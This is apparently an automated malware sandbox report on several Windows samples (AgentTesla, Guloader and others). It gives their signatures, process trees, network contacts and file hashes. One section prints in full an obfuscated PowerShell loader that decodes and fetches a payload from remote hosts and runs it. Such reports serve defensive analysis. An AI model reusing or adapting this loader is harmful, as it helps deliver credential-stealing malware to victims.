memory/4800-388-0x00000000008F0000-0x0000000001B43000-memory.dmp
memory/4800-391-0x00000000008F0000-0x0000000001B43000-memory.dmp
memory/4800-394-0x00000000008F0000-0x0000000001B43000-memory.dmp
memory/4800-397-0x00000000008F0000-0x0000000001B43000-memory.dmp
Analysis: behavioral8
Detonation Overview
Submitted
2024-11-06 02:10
Reported
2024-11-06 02:13
Platform
win10ltsc2021-20241023-en
Max time kernel
141s
Max time network
146s
Command Line
Signatures
AgentTesla
Agenttesla family
Loads dropped DLL
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Quotation.exe | N/A |
Reads WinSCP keys stored on the system
Reads data files stored by FTP clients
Reads user/profile data of local email clients
Reads user/profile data of web browsers
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| N/A | drive.google.com | N/A | N/A |
| N/A | drive.google.com | N/A | N/A |
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | api.ipify.org | N/A | N/A |
| N/A | api.ipify.org | N/A | N/A |
Suspicious use of NtCreateThreadExHideFromDebugger
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Quotation.exe | N/A |
Suspicious use of NtSetInformationThreadHideFromDebugger
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Quotation.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Quotation.exe | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 3828 set thread context of 1316 | N/A | C:\Users\Admin\AppData\Local\Temp\Quotation.exe | C:\Users\Admin\AppData\Local\Temp\Quotation.exe |
Drops file in Program Files directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Program Files (x86)\Common Files\brisantgranatens\baegersvamp.For | C:\Users\Admin\AppData\Local\Temp\Quotation.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Common Files\Azonic255\lithoclase.ini | C:\Users\Admin\AppData\Local\Temp\Quotation.exe | N/A |
Enumerates physical storage devices
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\Quotation.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\Quotation.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Quotation.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Quotation.exe | N/A |
Suspicious behavior: MapViewOfSection
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Quotation.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\Quotation.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Quotation.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 3828 wrote to memory of 1316 | N/A | C:\Users\Admin\AppData\Local\Temp\Quotation.exe | C:\Users\Admin\AppData\Local\Temp\Quotation.exe |
| PID 3828 wrote to memory of 1316 | N/A | C:\Users\Admin\AppData\Local\Temp\Quotation.exe | C:\Users\Admin\AppData\Local\Temp\Quotation.exe |
| PID 3828 wrote to memory of 1316 | N/A | C:\Users\Admin\AppData\Local\Temp\Quotation.exe | C:\Users\Admin\AppData\Local\Temp\Quotation.exe |
| PID 3828 wrote to memory of 1316 | N/A | C:\Users\Admin\AppData\Local\Temp\Quotation.exe | C:\Users\Admin\AppData\Local\Temp\Quotation.exe |
| PID 3828 wrote to memory of 1316 | N/A | C:\Users\Admin\AppData\Local\Temp\Quotation.exe | C:\Users\Admin\AppData\Local\Temp\Quotation.exe |
Processes
C:\Users\Admin\AppData\Local\Temp\Quotation.exe
"C:\Users\Admin\AppData\Local\Temp\Quotation.exe"
C:\Users\Admin\AppData\Local\Temp\Quotation.exe
"C:\Users\Admin\AppData\Local\Temp\Quotation.exe"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 196.249.167.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 68.32.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 232.168.11.51.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 53.210.109.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 15.164.165.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | drive.google.com | udp |
| GB | 142.250.187.206:443 | drive.google.com | tcp |
| US | 8.8.8.8:53 | c.pki.goog | udp |
| GB | 142.250.187.227:80 | c.pki.goog | tcp |
| US | 8.8.8.8:53 | o.pki.goog | udp |
| US | 8.8.8.8:53 | 206.187.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 227.187.250.142.in-addr.arpa | udp |
| GB | 142.250.187.227:80 | o.pki.goog | tcp |
| US | 8.8.8.8:53 | drive.usercontent.google.com | udp |
| GB | 172.217.16.225:443 | drive.usercontent.google.com | tcp |
| US | 8.8.8.8:53 | 225.16.217.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | api.ipify.org | udp |
| US | 104.26.12.205:443 | api.ipify.org | tcp |
| US | 8.8.8.8:53 | 205.12.26.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 30.243.111.52.in-addr.arpa | udp |
Files
C:\Users\Admin\AppData\Local\Temp\nsi99B2.tmp\System.dll
| MD5 | d6f54d2cefdf58836805796f55bfc846 |
| SHA1 | b980addc1a755b968dd5799179d3b4f1c2de9d2d |
| SHA256 | f917aef484d1fbb4d723b2e2d3045cb6f5f664e61fbb3d5c577bd1c215de55d9 |
| SHA512 | ce67da936a93d46ef7e81abc8276787c82fd844c03630ba18afc3528c7e420c3228bfe82aeda083bb719f2d1314afae913362abd1e220cb364606519690d45db |
memory/3828-15-0x0000000077641000-0x0000000077761000-memory.dmp
memory/3828-17-0x0000000074245000-0x0000000074246000-memory.dmp
memory/3828-16-0x0000000077641000-0x0000000077761000-memory.dmp
memory/1316-18-0x00000000776C8000-0x00000000776C9000-memory.dmp
memory/1316-19-0x00000000776E5000-0x00000000776E6000-memory.dmp
memory/1316-33-0x0000000077641000-0x0000000077761000-memory.dmp
memory/1316-32-0x0000000000820000-0x0000000001A73000-memory.dmp
memory/1316-34-0x00000000724CE000-0x00000000724CF000-memory.dmp
memory/1316-35-0x0000000000820000-0x0000000000860000-memory.dmp
memory/1316-36-0x000000003A6A0000-0x000000003AC46000-memory.dmp
memory/1316-37-0x000000003A600000-0x000000003A666000-memory.dmp
memory/1316-38-0x00000000724C0000-0x0000000072C71000-memory.dmp
memory/1316-39-0x000000003B430000-0x000000003B480000-memory.dmp
memory/1316-41-0x000000003B480000-0x000000003B512000-memory.dmp
memory/1316-42-0x000000003BFF0000-0x000000003BFFA000-memory.dmp
memory/1316-43-0x00000000724CE000-0x00000000724CF000-memory.dmp
memory/1316-44-0x00000000724C0000-0x0000000072C71000-memory.dmp
Analysis: behavioral9
Detonation Overview
Submitted
2024-11-06 02:10
Reported
2024-11-06 02:13
Platform
win10ltsc2021-20241023-en
Max time kernel
149s
Max time network
154s
Command Line
Signatures
Blocklisted process makes network request
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-87863914-780023816-688321450-1000\Control Panel\International\Geo\Nation | C:\Windows\System32\WScript.exe | N/A |
Enumerates physical storage devices
System Network Configuration Discovery: Internet Connection Discovery
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\ping.exe | N/A |
Runs ping.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\ping.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 4444 wrote to memory of 4560 | N/A | C:\Windows\System32\WScript.exe | C:\Windows\System32\ping.exe |
| PID 4444 wrote to memory of 4560 | N/A | C:\Windows\System32\WScript.exe | C:\Windows\System32\ping.exe |
| PID 4444 wrote to memory of 2076 | N/A | C:\Windows\System32\WScript.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
| PID 4444 wrote to memory of 2076 | N/A | C:\Windows\System32\WScript.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Processes
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\å ±åƒ¹è«‹æ±‚ - 樣本目錄.vbs"
C:\Windows\System32\ping.exe
ping Horm5zl_6637.6637.6637.657e
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" " <#Fiskefartjers Salomonic bullion Kyschtymite Gg Prisaendringer #>;$Vaabenfabrikken='Regier';<#Haemningsloese Euphonized Hertugdmmet Stickler #>;$Perirectitis=$nordpol+$host.UI; function Unglutinousness($Accessarily){If ($Perirectitis) {$Enden++;}$Dunjakke=$Skaansomme+$Accessarily.'Length'-$Enden; for( $Overconservative=4;$Overconservative -lt $Dunjakke;$Overconservative+=5){$Sigillography193=$Overconservative;$Kneppede+=$Accessarily[$Overconservative];$overtrdelsernes='Dyarchic';}$Kneppede;}function Slagvarer($Pigless195){ & ($Tidsplaners) ($Pigless195);}$Udenrigstjenesterne=Unglutinousness ' AppMBrndo attzLindi.alelCounlSpriay ll/Disc ';$Feltlngders=Unglutinousness ' G oTUncrl Gnas ano1Med 2Ps,u ';$Gejlende167='.dbo[RehiNPla e .ilt Opt.DiruSHabieHeinRprosv.angIAndrCMasse fripsco oPunci InjnB.rstOkkuMUdstAHornN Reua W.oGKodiE lsiRDalr] Par:Bact:ForasSteeEPle c AnkUB,nkRC.anIE viTBogsy.esupCoterFaddOTrykTCardOBlodCMoutO FosLHarm=Toop$Ta tfP stE krlPecuTXantLPantnFartgRepod ifeE,nter KaosB gn ';$Udenrigstjenesterne+=Unglutinousness 'Frys5me.n.Unex0Aflo Rep(Mgt W,usriEl,kn igd.obpoPoiswb wes Nat A keNFangTBur, Bisa1Poly0Grun.Tu n0M.lj;satr Ang,WSubtiNeedn Cla6 Tra4Ovic; ,op BurgxFodb6Ring4Skju;Rund Hj r AanvAlb :f es1Dron3 Met1Di r.Cond0Y ge)Sta S usG BeteUnvocNo skspato Rib/karr2Pala0Barn1B.ke0 aas0Klap1 Per0 Re 1S or P.iFPaamiP nnrPippePseufSculo ReaxCobr/An j1Skik3Gu.d1Omfo. Epi0Skum ';$Overconservativedrtsklub=Unglutinousness 'DecouDrejs Ud eKompR Bos-DiscaK.rsgparleDa aNSu,sTbewr ';$Fnomenologis=Unglutinousness 'T.dehSlvft biltFl,ppSa bs Bes:Obj,/Jerk/Ecc bSerrrB aiuHelttOphaa ast.UngipB lelOmo,/SkruIGrapbSk.trUdtru CysgPre t resale ig S feOplslSkuds Baae ,lps ls. Fo ppro c nubxnoni>Rigeh Supt CritLipopH glsW ea: Eng/Undi/FestpForfr AfboDr,bmAmbaeHensn Fartgue.eUnu r Arr.JordrRefisskve/sadoIAraub MarrBesluEnamgTo,ntMa.taRealgAf.veStyllBaktsMiljePed sHalv. Ledp ReacWe exHorn ';$Rancourous=Unglutinousness 'Gear>Dags ';$Tidsplaners=Unglutinousness ' su I Ovee P sxSpac ';$Febrene='Dampningen';$Overconservativenterramal131='\Hylozoist.ony';Slagvarer (Unglutinousness 'Jule$MindgAbsoLFor.OTranBRempAB biL Ile: SalatintnSteaGAllerj ggEHa bbSergsNakev.ollAP ndaSekrB,otiE EtuNStr sReto=Proc$Irrie BrunSystvRens:A stA Fl.Pnon PLased MinADepiTLazaAFina+ M s$ gebOOverVKypeE onorD laCS.nio nsnPhytS abEIndwrS,devMennAIntetUroliGenrVB.rrEUndeNSustT M sEfakuRFilcR onfaWic.m nfaaR itl Ber1 Sky3Prof1Dere ');Slagvarer (Unglutinousness 'Inta$SkrfGAssiL AyaO Eksb intaAfsvLUnve:Ant o eprTA.siARundCRutiUAffaSUnskTReac=Jeal$TurbF KonNF.rso V.nMMisrePokeN UncO sh.L.rimOZeugg,verIPhanS Fe .IdmtSU dep Mo LPiskIAc.uT or(Prfa$.ideRVandADetanDiscc.fsgO M.luSendrR spo Deau PatSFor )I ar ');Slagvarer (Unglutinousness $Gejlende167);$Fnomenologis=$Otacust[0];$Hypogastrium28=(Unglutinousness ' Fej$.illgK.ntL.picoCuraBSansa Real Hei:Bu.tsOrtso elMDiskmmap EDamnr BeagVagnsSurftTraaEQua nphil=H,miNGruneSkaawTe,r-U,fhoIndfbSejrJNerveMisiCUnloTEnem IndSLaryYFgtes tiptPhloePlanM eut. OmsNChrie Kult ila.OdalwL bre,rdlbDoigcCoryl b yIChedeContnRid t,ord ');Slagvarer ($Hypogastrium28);Slagvarer (Unglutinousness 'L ng$ HavS N eoSp rmEnk,mbew eI anrmythgG.ais V ntRnb,e Sidn unp.Aug H .pteNetta ridResteUnmarNeurs pho[verm$GrunO ligv.ankeTyverRundcLangoPlumnNigrsPyr e DudrSt.lvSulaaFyrvtFrysiPumpv brie NoxdSen rRanitSe.gsTappkAquilCarauBianbkaps]E cy= Isl$H,emUQ addSoneeKlavnPlurrPreciGnidgSodasHu htAnstjSvogelegin .ebeAb dsDeretUn,veDur.rPam nVreleReal ');$Herpetolog=Unglutinousness 'Myre$ Su.S msaoLogamFis mJ roeReg rDemigL.gasc.hotLapieustan Int. SysDTel.oU dew rknntilmlAyuboSkroaAnnidDek F,lteiChr,lTegneF,de( rdi$ProtFInt n ilioIn.rmParoeCapsnPrbeo forlTylvohaugg Subi.nissB ad,Fort$GlobAUndefTelef snkaHypotBudgtSesseBespdFooleMedasToed)Sp b ';$Affattedes=$Angrebsvaabens;Slagvarer (Unglutinousness ' im $SpgeGSabbl PsioRemaBLoksaPetrlGlug:MeleNKompoTrimNDialHSyrlyCrosp.aleeTe eRhiorBLogiO ho,LLegaiarbecBlad1 Luc1 Fla0Zany=P.ot(BaxyT FryePe.pSTu iTd ns-SummpPagoaTo dTT llhMayo Le e$ BreAMac FBndeFUngkaCarrT KleTRetseVelgdovereIndesHemo)Indf ');while (!$Nonhyperbolic110) {Slagvarer (Unglutinousness ' Ele$Sterg,glslknaloPa zbpentaNon.l Roe: CorKpistvDesia snedNazerP emaPoron lastKommeChucrKonc=Slov$Kno,tBe gr unau emfeSynk ') ;Slagvarer $Herpetolog;Slagvarer (Unglutinousness ' ros FritNonca Th rVettThauc-OrnasQ adL andeFyldEDreipEc r Udga4balt ');Slagvarer (Unglutinousness '.lum$ A rGStiklFideoDormBDodeALavrlIndm:BoarNPlagOP lyN Unbhdek.y.rappPinnEPrecRL arBPol OTel,LRubrI NetcR de1Wayf1tar,0Z nc=D pe(IlpaTDepoeUddaSGypstSeat-DrejPWorkAOprrT DacHTriv ejen$Afspaf dlfWidoFAm taUnfoTVrditFde eDelpdSp leOutnsTilg) ,nd ') ;Slagvarer (Unglutinousness 'Stam$Ov rGmathL fiOPlatBKl.bAChilLPark: fsAMiliRapicbJakoEOfthJMadedThelSJog pHerrlSkrmiEnemgOverTPietEPeasrNe snstikeFrus=Inds$JennG ,avLPersOPr,mbLampaH rml Lan:Bv eFS mmACrincT lrIVellLOpiniScalTMou.aPatlTOthaoKredRoolaYU.va3Uoev6Spar+ ,dk+ mst% Her$ CypOFolkTSupraDidycH loufuldsGudst .ap.OpkocBarnOLystuAlarnUdgaTCyto ') ;$Fnomenologis=$Otacust[$Arbejdspligterne];}$Anticipators=340909;$arbejdspladsers=30602;Slagvarer (Unglutinousness 'Unde$BageGkirslPrevOAssebAbstaVandlReak:D nusUltrH UdsEA talretstD vaE.abbRPrevdNuclkOverkMycaE CadrSwo eWin sF gb2T ll6Be l sild= ,on NedsgVolueTalwtvase-,oldcsam.oSumpn vertTilserumenP,nktSleg arc$,mbeaBallFka.ofgen aUds T Fo,t NoneUnacD t oEIam sDest ');Slagvarer (Unglutinousness 'slut$fo lgBea.lGraeo G.db Ph aDemolInsu:OutsVL,ceiHuncpAr ep C.eeFortl HanaAmildCine Myrt= Int Inn[EnebSProsyPibesPlagt AlkePropmTe n.Re rCAnstoun enSangv BareInternatut Gen]Anal:Komp: DomFHydrrFuraoDka mGro BLimia orls OtoePrec6Vedd4ske,SLivstMonorSkrhiEndenCupog.uto(Subl$Fav SCorphRabieFrihlunent ngeKor rPetadSaxkk ejlkMin.eGrunr Slve Sygs Sup2Warr6Dela)Sm.t ');Slagvarer (Unglutinousness 'Xylo$ VasgActiLTilso OmkBim aaFriel obb:B.stUByldn,empG uncD Udso VolmSkinM.wagEPostLmagnIPibeg BulE yprOog,EGotc Udhu=V nd Se,i[EkstS SokYAnkeSRegnTDeflES.mhMsvar.sprlt A,he llxAnsatDamo. elE ournBackcIn,oo BevD Subi svin ShoG No ] are: Upb: asyat elsHumaCCo sIIsneiSemi.UndsgB,llELabaTGuldsBogltComprTrapIGenoNAprjg rg(Scum$QuarvU,acIApaypWomaPNon EInkal BubA IntdLege) Arb ');Slagvarer (Unglutinousness 'Bic $Z mogGymnlProfOVartBSkilaPreslOut,: onrMBowsaAgglCKol MJo bOS,teRCoprRSm aiAllesVulc=Nonb$LeanUEminnMategLeptdBereOPrimmJernM,piseDokklSindI HilgpaakePredr KvaEGuan.SlaaS razULateb UdssB,nat PapR RacI ShoNPostG al( Di $A abAGr,nN SkatListiValdc AnoITillPBenzaSndrtS ovoEc erKexsSUnpa,e sl$g unATrapR SambSub.EOddsJGradDRudds lapTokrL HenaOmegdKam.SOr lED,nnrC taSCen )scut ');Slagvarer $Macmorris;"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 154.239.44.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | Horm5zl_6637.6637.6637.657e | udp |
| US | 8.8.8.8:53 | 172.214.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | bruta.pl | udp |
| PL | 77.55.252.166:443 | bruta.pl | tcp |
| US | 8.8.8.8:53 | 69.31.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 166.252.55.77.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 228.249.119.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | promenter.rs | udp |
| RS | 77.105.36.128:443 | promenter.rs | tcp |
| US | 8.8.8.8:53 | 128.36.105.77.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 232.168.11.51.in-addr.arpa | udp |
| PL | 77.55.252.166:443 | bruta.pl | tcp |
| RS | 77.105.36.128:443 | promenter.rs | tcp |
| PL | 77.55.252.166:443 | bruta.pl | tcp |
| US | 8.8.8.8:53 | 212.20.149.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 18.31.95.13.in-addr.arpa | udp |
| RS | 77.105.36.128:443 | promenter.rs | tcp |
| PL | 77.55.252.166:443 | bruta.pl | tcp |
| RS | 77.105.36.128:443 | promenter.rs | tcp |
| PL | 77.55.252.166:443 | bruta.pl | tcp |
| RS | 77.105.36.128:443 | promenter.rs | tcp |
| PL | 77.55.252.166:443 | bruta.pl | tcp |
| US | 8.8.8.8:53 | 240.221.184.93.in-addr.arpa | udp |
| RS | 77.105.36.128:443 | promenter.rs | tcp |
| PL | 77.55.252.166:443 | bruta.pl | tcp |
| RS | 77.105.36.128:443 | promenter.rs | tcp |
| PL | 77.55.252.166:443 | bruta.pl | tcp |
| RS | 77.105.36.128:443 | promenter.rs | tcp |
| PL | 77.55.252.166:443 | bruta.pl | tcp |
| RS | 77.105.36.128:443 | promenter.rs | tcp |
| US | 8.8.8.8:53 | 31.243.111.52.in-addr.arpa | udp |
| PL | 77.55.252.166:443 | bruta.pl | tcp |
| RS | 77.105.36.128:443 | promenter.rs | tcp |
| PL | 77.55.252.166:443 | bruta.pl | tcp |
| RS | 77.105.36.128:443 | promenter.rs | tcp |
| US | 8.8.8.8:53 | bruta.pl | udp |
| PL | 77.55.252.166:443 | bruta.pl | tcp |
| RS | 77.105.36.128:443 | promenter.rs | tcp |
| PL | 77.55.252.166:443 | bruta.pl | tcp |
| RS | 77.105.36.128:443 | promenter.rs | tcp |
| PL | 77.55.252.166:443 | bruta.pl | tcp |
Files
memory/2076-0-0x00007FFBDD143000-0x00007FFBDD145000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_p4jjzquc.lec.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/2076-10-0x00000130257D0000-0x00000130257F2000-memory.dmp
memory/2076-11-0x00007FFBDD140000-0x00007FFBDDC02000-memory.dmp
memory/2076-12-0x00007FFBDD140000-0x00007FFBDDC02000-memory.dmp
memory/2076-13-0x00007FFBDD140000-0x00007FFBDDC02000-memory.dmp
memory/2076-14-0x00007FFBDD143000-0x00007FFBDD145000-memory.dmp
memory/2076-15-0x00007FFBDD140000-0x00007FFBDDC02000-memory.dmp
memory/2076-16-0x00007FFBDD140000-0x00007FFBDDC02000-memory.dmp
Analysis: behavioral1
Detonation Overview
Submitted
2024-11-06 02:10
Reported
2024-11-06 02:13
Platform
win10ltsc2021-20241023-en
Max time kernel
98s
Max time network
140s
Command Line
Signatures
Drops startup file
| Description | Indicator | Process | Target |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\asset.vbs | C:\Users\Admin\AppData\Local\phytographic\asset.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\phytographic\asset.exe | N/A |
AutoIT Executable
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 4400 set thread context of 3940 | N/A | C:\Users\Admin\AppData\Local\phytographic\asset.exe | C:\Windows\SysWOW64\svchost.exe |
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\#10302024.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\phytographic\asset.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\svchost.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\svchost.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\svchost.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\svchost.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\svchost.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\svchost.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\svchost.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\svchost.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\svchost.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\svchost.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\svchost.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\svchost.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\svchost.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\svchost.exe | N/A |
Suspicious behavior: MapViewOfSection
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\phytographic\asset.exe | N/A |
Suspicious use of FindShellTrayWindow
Suspicious use of SendNotifyMessage
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 624 wrote to memory of 4400 | N/A | C:\Users\Admin\AppData\Local\Temp\#10302024.exe | C:\Users\Admin\AppData\Local\phytographic\asset.exe |
| PID 624 wrote to memory of 4400 | N/A | C:\Users\Admin\AppData\Local\Temp\#10302024.exe | C:\Users\Admin\AppData\Local\phytographic\asset.exe |
| PID 624 wrote to memory of 4400 | N/A | C:\Users\Admin\AppData\Local\Temp\#10302024.exe | C:\Users\Admin\AppData\Local\phytographic\asset.exe |
| PID 4400 wrote to memory of 3940 | N/A | C:\Users\Admin\AppData\Local\phytographic\asset.exe | C:\Windows\SysWOW64\svchost.exe |
| PID 4400 wrote to memory of 3940 | N/A | C:\Users\Admin\AppData\Local\phytographic\asset.exe | C:\Windows\SysWOW64\svchost.exe |
| PID 4400 wrote to memory of 3940 | N/A | C:\Users\Admin\AppData\Local\phytographic\asset.exe | C:\Windows\SysWOW64\svchost.exe |
| PID 4400 wrote to memory of 3940 | N/A | C:\Users\Admin\AppData\Local\phytographic\asset.exe | C:\Windows\SysWOW64\svchost.exe |
Processes
C:\Users\Admin\AppData\Local\Temp\#10302024.exe
"C:\Users\Admin\AppData\Local\Temp\#10302024.exe"
C:\Users\Admin\AppData\Local\phytographic\asset.exe
"C:\Users\Admin\AppData\Local\Temp\#10302024.exe"
C:\Windows\SysWOW64\svchost.exe
"C:\Users\Admin\AppData\Local\Temp\#10302024.exe"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 97.17.167.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 88.210.23.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 73.159.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 232.168.11.51.in-addr.arpa | udp |
| US | 8.8.8.8:53 | fd.api.iris.microsoft.com | udp |
| IE | 20.223.36.55:443 | fd.api.iris.microsoft.com | tcp |
| US | 8.8.8.8:53 | 53.210.109.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 55.36.223.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 241.42.69.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.214.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 30.243.111.52.in-addr.arpa | udp |
Files
memory/624-2-0x0000000000F30000-0x0000000001330000-memory.dmp
C:\Users\Admin\AppData\Local\phytographic\asset.exe
| MD5 | 432523c2a91f208ce00e9aa553c25883 |
| SHA1 | 00fc307df8d7970dc4ca4c9f786d025d1032aeee |
| SHA256 | a131f667cc1c8ab17777294ffc556a8b45dd726452ccc10d716daa39d256d3a6 |
| SHA512 | 7a1e1f31b79bb9eff8a7463b7bb40aeb837584c990bce85b6189c07597c6bc12e17fecd1c09f53b163640b9f5e36cf6968c19499a7bf8a6d9210c9523361b31d |
C:\Users\Admin\AppData\Local\Temp\pyogenesis
| MD5 | d41d8cd98f00b204e9800998ecf8427e |
| SHA1 | da39a3ee5e6b4b0d3255bfef95601890afd80709 |
| SHA256 | e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 |
| SHA512 | cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e |
memory/4400-10-0x00000000014F0000-0x00000000018F0000-memory.dmp
memory/3940-12-0x0000000000400000-0x0000000000447000-memory.dmp
memory/3940-13-0x0000000001400000-0x000000000174C000-memory.dmp
memory/3940-14-0x0000000000400000-0x0000000000447000-memory.dmp
memory/3940-15-0x0000000000400000-0x0000000000447000-memory.dmp
Analysis: behavioral2
Detonation Overview
Submitted
2024-11-06 02:10
Reported
2024-11-06 02:13
Platform
win10ltsc2021-20241023-en
Max time kernel
16s
Max time network
145s
Command Line
Signatures
Guloader family
Guloader,Cloudeye
Loads dropped DLL
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\102924_5830760.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\102924_5830760.exe | N/A |
Drops file in Program Files directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Program Files (x86)\Common Files\customization.rom | C:\Users\Admin\AppData\Local\Temp\102924_5830760.exe | N/A |
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\resources\primy.ini | C:\Users\Admin\AppData\Local\Temp\102924_5830760.exe | N/A |
Enumerates physical storage devices
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\102924_5830760.exe | N/A |
Processes
C:\Users\Admin\AppData\Local\Temp\102924_5830760.exe
"C:\Users\Admin\AppData\Local\Temp\102924_5830760.exe"
C:\Users\Admin\AppData\Local\Temp\102924_5830760.exe
"C:\Users\Admin\AppData\Local\Temp\102924_5830760.exe"
Network
